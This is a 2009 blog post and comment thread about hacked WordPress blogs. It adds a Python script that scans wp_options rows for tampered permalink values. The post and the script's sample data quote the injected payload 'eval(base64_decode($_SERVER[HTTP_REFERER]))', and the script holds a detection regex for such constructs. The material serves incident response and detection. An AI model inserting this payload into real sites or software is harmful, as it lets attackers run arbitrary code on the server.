Urgent Security Warning for WordPress
September 5, 2009 Posted by KP
I just found that my two WordPress blogs were hacked; the permanent link structure was changed to:
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
This caused the individual posts to become inaccessible.
I don’t know how this was hacked, or what other damage was caused. For now, an urgent solution would be protecting the wp-admin directory.
I have seen some other hacked blogs, and I strongly suggest you take action immediately. The above might not be a good solution, but it should be helpful.
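A quick way to check your own installs for this kind of tampering is to look at the permalink and rewrite-rule rows in the wp_options table. The script below is an added example, not part of the original post; it assumes you have already exported those rows (for instance with `SELECT option_name, option_value FROM wp_options`) and feeds them in as (name, value) pairs. The sample rows are constructed here: the first one reproduces the injected structure quoted above, the rest are ordinary clean values, including the rewrite_rules and _transient_rewrite_rules fields the commenters mention further down.

```python
import re

# Constructed sample wp_options rows (option_name, option_value).
# The first value reproduces the injected permalink structure quoted in the post;
# the others are typical clean values.
SAMPLE_OPTIONS = [
    ("permalink_structure",
     "/%year%/%monthnum%/%day%/%postname%/"
     "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"),
    ("permalink_structure", "/%year%/%monthnum%/%day%/%postname%/"),
    ("rewrite_rules", 'a:1:{s:7:"feed/?$";s:17:"index.php?&feed=1";}'),
    ("_transient_rewrite_rules", 'a:1:{s:7:"feed/?$";s:17:"index.php?&feed=1";}'),
]

# A legitimate permalink structure is made of %tag% placeholders and plain path characters.
TAG_RE = re.compile(r"%[a-z_]+%")
PATH_CHARS_RE = re.compile(r"^[A-Za-z0-9/_.\-]*$")

# Constructs that never belong in a permalink or rewrite rule: PHP code execution,
# superglobal access, and the ${...} interpolation used to smuggle them into a regex.
SUSPICIOUS_RE = re.compile(
    r"eval\s*\(|base64_decode|assert\s*\(|\$_(?:SERVER|GET|POST|REQUEST|COOKIE)|\$\{",
    re.IGNORECASE,
)


def is_clean_permalink(value):
    """True when the structure contains only %tag% placeholders and path characters."""
    return PATH_CHARS_RE.match(TAG_RE.sub("", value)) is not None


def scan_options(rows):
    """Return (option_name, [reasons]) for every row that looks tampered with."""
    findings = []
    for name, value in rows:
        reasons = []
        if SUSPICIOUS_RE.search(value):
            reasons.append("contains a PHP execution or superglobal construct")
        if name == "permalink_structure" and not is_clean_permalink(value):
            reasons.append("characters outside the %tag%/path alphabet")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    # Running the script over the constructed rows flags only the injected structure.
    for name, reasons in scan_options(SAMPLE_OPTIONS):
        print(f"{name}: {'; '.join(reasons)}")
```

The two checks are deliberately independent: the character-set check catches anything that is not a plain %tag%/path structure even if the payload uses a construct the keyword list does not know, while the keyword check also covers the serialized rewrite_rules rows, where a strict alphabet check would not apply. A hit on either one is a reason to restore the option from the admin panel and then go looking for how the value got there.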
Filed Under: Security
September 5th, 2009 at 1:33 am
One of my WP blogs was hacked as well, and I am wondering about the _transient_rewrite_rules row in the wp_options table. This post says to empty it: http://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/
I did that with no immediately apparent negative effects on the blog, but I don’t really know what all the gibberish was doing. I checked a couple other blogs and the string is different in different blogs.
It looks like legitimate code to me, but I can’t tell.
September 5th, 2009 at 1:39 am
Luke: I only changed the permanent link structure back with the admin control panel; I didn’t modify the database directly, and now the hacked blogs seem to work fine.
September 5th, 2009 at 1:52 am
Is this related to the <=2.8.3 admin password reset bug? Is there something I need to do to protect my WP installs?
September 5th, 2009 at 1:59 am
It doesn’t seem to be the same problem; this is probably a new exploit which hasn’t been addressed. I protected the wp-admin directory for all my WP blogs.
September 5th, 2009 at 2:14 am
Cool - will look into your post on that.
September 5th, 2009 at 1:08 pm
More good info coming out on this hack: http://blog.nachotech.com/?p=125
I also tried renaming xmlrpc.php and wp-register.php, which are in the WP root. Lots of chaos out there… it seems to be all versions older than 2.8.4 so far. That means I am not 100% safe yet…
September 5th, 2009 at 2:31 pm
Thanks for the link, Luke, it has lots of good info. I only protected the admin directory, which seems not to be enough at all.
Upgrading to the latest version is always a good habit.
Protecting the admin directory is very important; it can prevent most exploits. Even after the site has been hacked and a back door left behind, without access to the files under wp-admin not much can be done.
September 9th, 2009 at 4:52 am
Had a site that was hacked with the wp-cache plugin installed, and fixing it took a lot longer. Had to clear some data out of the permalinks option AND out of the rewrite_rules field, and had to disable all plugins to get anything to display at all!
WP-Cache seems to have been to blame, but it was strange that nothing would display (blank white page) for both the site and the /wp-admin/ directory.
October 9th, 2009 at 12:59 pm
Sorry, missed your comment. When you get blank pages, check Apache error log file, usually it will tell you what’s wrong.